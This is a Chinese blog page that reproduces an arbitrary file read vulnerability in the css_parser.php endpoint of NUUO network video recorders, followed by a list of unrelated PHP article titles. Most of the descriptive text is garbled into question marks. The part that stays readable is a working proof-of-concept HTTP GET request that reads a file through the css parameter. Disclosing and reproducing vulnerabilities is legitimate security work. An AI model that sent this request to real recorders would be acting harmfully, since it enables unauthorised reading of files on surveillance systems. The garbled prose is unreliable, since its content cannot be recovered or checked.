博客
关于我
NUUO网络视频录像机 css_parser.php 任意文件读取漏洞复现
阅读量:805 次
发布时间:2023-02-17

本文共 764 字,大约阅读时间需要 2 分钟。

0x01 NUUO???????????

NUUO????????Network Video Recorder???NVR??NUUO Inc.???????????????????????????????????????????????????????IP????????????????????????????????????NUUO NVR??????????????????????????

0x02 ????

???????????????????css_parser.php???????????????????????????????????????????????????????????????????????????????????

0x03 ??????

????????????????

????????URL??GET?????????

GET /css_parser.php?css=css_parser.php HTTP/1.1

??????????????????User-Agent??????

Host: www.nuuo.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:xx.xx.xx) Gecko/20100101 Firefox/xx.xx

0x04 ????

?????????PoC?Proof of Concept?????????????

GET /css_parser.php?css=css_parser.php HTTP/1.1  Host: www.nuuo.com

??????????css_parser.php???????????????????????????????????????

转载地址:http://hwnfk.baihongyu.com/

你可能感兴趣的文章
php中的session用法
查看>>
php之aop实践
查看>>
PHP二维数组将重复键值合并重组成三维数组
查看>>
PHP二维数组转换为一维数组
查看>>
PHP交换两个变量值
查看>>
PHP代码格式化工具phpcf常见问题解决方案
查看>>
PHP学习总结(12)——PHP入门篇之变量
查看>>
PHP学习总结(4)——PHP入门篇之PHP计算表达式
查看>>
PHP学习笔记一:谁动了你的mail(),PHP?
查看>>
PHP安全实战
查看>>
php安装扩展
查看>>
php实现根据身份证获取年龄
查看>>
PHP实现的MongoDB数据增删改查
查看>>
PHP对表单提交特殊字符的过滤和处理
查看>>
PHP将图片转换成base64格式(优缺点)
查看>>
php将多个值的数组去除重复元素
查看>>
php局域网上传文件_PHP如何通过CURL上传文件
查看>>
PHP工具插件大全
查看>>
PHP开发规范PSR
查看>>
PHP开发遇到错误0001
查看>>